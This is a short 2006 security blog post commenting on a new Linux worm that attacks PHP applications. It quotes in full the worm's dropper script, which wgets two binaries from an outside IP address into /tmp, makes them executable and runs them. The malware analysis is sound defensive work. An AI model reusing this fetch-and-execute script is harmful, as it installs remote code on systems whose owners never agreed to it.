More info on the new Linux worm
February 18th, 2006 by SecuriTeam, Filed under: Commentary, Linux, Virus
the first part of worm is yet another php worm (with drupal, wordpress, etc. attacked).
more information on older versions here:
http://isc.sans.org/diary.php?storyid=823
there is another shell script called gicumz there:
#!/bin/bash
cd /tmp
wget 209.123.16.34/session
chmod +x session
./session
cd /tmp
wget 209.123.16.34/derfiq
chmod +x derfiq
./derfiq
the worm itself that runs on the linux system though, is something new as far as we can tell.
gadi evron,
ge@beyondsecurity.com.
Subscribe
Pingback: Scott’s blog » SecuriTeam Blogs � More info on the new Linux worm � 9.00
Pingback: לינמגזין
Pingback: Open Source Toolbox
Pingback: SecuriTeam Blogs » Plupii.C proved: Remarkable old Mambo CMS installations in use